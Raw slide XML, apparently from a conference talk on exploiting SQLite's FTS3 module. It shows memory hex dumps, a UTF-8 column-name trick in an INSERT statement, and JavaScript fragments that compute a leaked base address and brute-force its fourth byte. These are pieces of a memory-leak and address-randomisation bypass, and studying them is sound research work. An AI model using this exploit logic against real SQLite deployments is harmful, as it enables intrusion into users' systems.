              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 00 00 00 00 00 00 00 00</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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4" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5524787" y="785089"/>
            <a:ext cx="5292000" cy="19080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Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9873673" y="541032"/>
            <a:ext cx="930850" cy="20880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876100955"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>40 CC 2F A4 C3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 00 00 00 00 00 00 41 05 04 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>6C 30</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 54 A4 C3 21 00 00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 00 00 00 00 00 00 00 00</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9522698" y="541032"/>
            <a:ext cx="628066" cy="188641"/>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Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5515551" y="1035079"/>
            <a:ext cx="628066" cy="188641"/>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 name="Curved Connector 4"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="15" idx="3"/>
            <a:endCxn id="20" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6143617" y="635353"/>
            <a:ext cx="3379081" cy="494047"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="25400">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848024"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>40 CC 2F A4 C3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 00 00 00 00 00 00 41 05 04 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>6C 30</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 54 A4 C3 21 00 00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 00 00 00 00 00 00 00 00</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1468581" y="527050"/>
            <a:ext cx="3733151" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>¤ = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\xC0     ( UTF-8  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>→  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C3 80 )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>INSERT INTO table2100(“¤”) VALUES (‘’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>⇒ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Success</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5201732" y="1126836"/>
            <a:ext cx="323055" cy="3034"/>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20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9522698" y="541032"/>
            <a:ext cx="628066" cy="188641"/>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Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5515551" y="1035079"/>
            <a:ext cx="628066" cy="188641"/>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 name="Curved Connector 4"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="15" idx="3"/>
            <a:endCxn id="20" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6143617" y="635353"/>
            <a:ext cx="3379081" cy="494047"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="25400">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8445662"/>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5198706" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>The 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>byte Heuristics</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6354146" y="0"/>
            <a:ext cx="5837854" cy="6858000"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="2E2E2E"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F8"/>
              </a:solidFill>
              <a:latin typeface="Monaco"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>fts3_azColumn_leaked_byte_count </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</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console.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>`Truncate it on purpose. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'re still </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gonna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> brute the 4th byte because we don'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>t know whether the leaked 4th </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>byte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>case</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> insensitive and hence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> inaccurate`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>        fts3_azColumn_leaked_value </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fts3_azColumn_leaked_value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Math</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF6400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>0x100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> fts3_azColumn_leaked_byte_count </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D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</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F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&gt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</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fts3_azColumn_leaked_byte_count </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D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>        console.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>`Case </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>`</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err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>leak_base_address</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 fts3_azColumn_leaked_value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> 0x1000000</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err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>leak_base_address</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 0x20000000</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err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>leak_base_address</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 B_0x1000_offset_3bytes</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BDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>else</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BDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>fts3_azColumn_leaked_byte_count </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D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</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F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;&amp;</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fts3_zWriteExprlist_leaked_byte_count </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</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console.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>`Case </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>`</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err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>leak_base_address</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 fts3_azColumn_leaked_value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
